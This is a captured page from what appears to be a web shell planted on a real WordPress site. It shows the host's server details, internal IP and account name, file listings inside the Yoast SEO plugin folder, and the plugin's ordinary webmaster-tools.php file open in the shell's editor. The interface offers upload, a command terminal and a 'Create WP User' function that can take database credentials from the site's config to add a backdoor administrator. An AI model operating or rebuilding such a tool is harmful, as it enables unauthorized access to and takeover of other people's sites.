Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
ocieplenia.konin.pl
/
wp-content
/
plugins
/
wordpress-seo
/
admin
/
views
/
tabs
/
dashboard
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
dashboard.php
1.11 KB
-rw-r--r--
2020-12-08 23:26
features.php
1.82 KB
-rw-r--r--
2020-12-08 23:26
site-analysis.php
408.00 B
-rw-r--r--
2020-12-08 23:26
webmaster-tools.php
3.31 KB
-rw-r--r--
2020-12-08 23:26
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
webmaster-tools.php
<?php /** * WPSEO plugin file. * * @package WPSEO\Admin\Views * * @uses Yoast_Form $yform Form object. */ if ( ! defined( 'WPSEO_VERSION' ) ) { header( 'Status: 403 Forbidden' ); header( 'HTTP/1.1 403 Forbidden' ); exit(); } $webmaster_tools_help = new WPSEO_Admin_Help_Panel( 'dashboard-webmaster-tools', esc_html__( 'Learn more about the Webmaster Tools verification', 'wordpress-seo' ), esc_html__( 'You can use the boxes below to verify with the different Webmaster Tools. This feature will add a verification meta tag on your home page. Follow the links to the different Webmaster Tools and look for instructions for the meta tag verification method to get the verification code. If your site is already verified, you can just forget about these.', 'wordpress-seo' ), 'has-wrapper' ); echo '<h2 class="help-button-inline">' . esc_html__( 'Webmaster Tools verification', 'wordpress-seo' ) . $webmaster_tools_help->get_button_html() . '</h2>'; echo $webmaster_tools_help->get_panel_html(); $msverify_link = 'https://www.bing.com/toolbox/webmaster/#/Dashboard/?url=' . rawurlencode( str_replace( 'http://', '', get_bloginfo( 'url' ) ) ); $googleverify_link = add_query_arg( [ 'hl' => 'en', 'tid' => 'alternate', 'siteUrl' => rawurlencode( get_bloginfo( 'url' ) ) . '/', ], 'https://www.google.com/webmasters/verification/verification' ); $yform->textinput( 'baiduverify', __( 'Baidu verification code', 'wordpress-seo' ) ); echo '<p class="desc label">'; printf( /* translators: %1$s expands to a link start tag to the Baidu Webmaster Tools site add page, %2$s is the link closing tag. */ esc_html__( 'Get your Baidu verification code in %1$sBaidu Webmaster Tools%2$s.', 'wordpress-seo' ), /** * Get the Baidu Webmaster Tools site add link from this 3rd party article. * {@link http://www.dragonmetrics.com/how-to-optimize-your-site-with-baidu-webmaster-tools/} * We are unable to create a Baidu Webmaster Tools account due to the Chinese phone number verification. */ '<a target="_blank" href="' . esc_url( 'https://ziyuan.baidu.com/site/siteadd' ) . '" rel="noopener noreferrer">', '</a>' ); echo '</p>'; $yform->textinput( 'msverify', __( 'Bing verification code', 'wordpress-seo' ) ); echo '<p class="desc label">'; printf( /* translators: 1: link open tag; 2: link close tag. */ esc_html__( 'Get your Bing verification code in %1$sBing Webmaster Tools%2$s.', 'wordpress-seo' ), '<a target="_blank" href="' . esc_url( $msverify_link ) . '" rel="noopener noreferrer">', '</a>' ); echo '</p>'; $yform->textinput( 'googleverify', __( 'Google verification code', 'wordpress-seo' ) ); echo '<p class="desc label">'; printf( /* translators: 1: link open tag; 2: link close tag. */ esc_html__( 'Get your Google verification code in %1$sGoogle Search Console%2$s.', 'wordpress-seo' ), '<a target="_blank" href="' . esc_url( $googleverify_link ) . '" rel="noopener noreferrer">', '</a>' ); echo '</p>'; $yform->textinput( 'yandexverify', __( 'Yandex verification code', 'wordpress-seo' ) ); echo '<p class="desc label">'; printf( /* translators: 1: link open tag; 2: link close tag. */ esc_html__( 'Get your Yandex verification code in %1$sYandex Webmaster Tools%2$s.', 'wordpress-seo' ), '<a target="_blank" href="' . esc_url( 'https://webmaster.yandex.com/sites/add/' ) . '" rel="noopener noreferrer">', '</a>' ); echo '</p>';
关闭
保存